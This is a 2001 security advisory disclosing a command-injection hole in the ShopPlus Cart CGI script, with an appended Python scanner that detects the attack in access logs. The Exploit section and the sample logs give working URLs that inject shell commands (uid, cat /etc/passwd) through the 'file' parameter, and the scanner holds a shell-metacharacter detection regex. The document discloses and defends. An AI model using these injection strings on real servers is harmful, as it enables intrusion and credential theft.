From: Kernel|X| (secure punkass.com)
Date: Wed Sep 05 2001 - 14:06:56 CDT
------------[ advisory ]------------
name: ShopPlus Cart
Bug Information:
The ShopPlus shopping cart system allows you to build a store or a mall on the Internet.
Because of its flexibility, it allows you to sell virtually any product or service and
fully customize the shopping experience of your web site.
http://www.ksofttech.com/help/shopplus/
Problem:
The script doesn't check the file parameter for shell metacharacters, so any user can execute commands on the web server.
Exploit:
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
Bug found by Kernel|X| and aLph4Num3ric
E-Mail:
secure punkass.com [kernel|x|]
alph4num3ric crackdealer.com [aLph4Num3ric]
WWW: www.russiahack.com / www.tmgroup.sh
------------
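The requests in the Exploit section above carry shell metacharacters (; and |) in the file parameter. As an added example (not part of the original advisory), this Python code flags such requests in a web server access log. The Combined Log Format, the sample log lines, the client addresses and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Characters that carry meaning to a Unix shell (assumed reject set).
SHELL_META = re.compile(r"[;|&`$<>(){}\\\n\r]")
# Request field of a Combined Log Format line: "METHOD target PROTOCOL"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; the flagged requests mirror the advisory's.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Sep/2001:14:10:01 -0500] "GET /scripts/shopplus.cgi'
    '?dn=domainname.com&cartid=1001&file=order.html HTTP/1.0" 200 5120',
    '192.0.2.66 - - [05/Sep/2001:14:11:37 -0500] "GET /scripts/shopplus.cgi'
    '?dn=domainname.com&cartid=1002&file=;cat%20/etc/passwd| HTTP/1.0" 200 941',
    '192.0.2.66 - - [05/Sep/2001:14:12:02 -0500] "GET /scripts/shopplus.cgi'
    '?dn=domainname.com&cartid=1002&file=%3Buid%7C HTTP/1.0" 200 77',
    '192.0.2.20 - - [05/Sep/2001:14:13:45 -0500] "GET /index.html?file=a;b '
    'HTTP/1.0" 200 10',
]

def suspicious_file_param(target):
    """Return the decoded 'file' value if it holds shell metacharacters."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/shopplus.cgi"):
        return None
    # Split on '&' only, so a ';' inside the value is never read as a separator.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if unquote_plus(name) != "file":
            continue
        value = unquote_plus(raw)  # decodes %3B, %7C, %20 and '+'
        if SHELL_META.search(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded_value) for each flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        hit = suspicious_file_param(m.group(1)) if m else None
        if hit is not None:
            hits.append((line.split(" ", 1)[0], hit))
    return hits

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} sent file={value!r}")
```

The same character class can serve as a reject rule in front of the script; an allowlist of expected file names is the stricter fix.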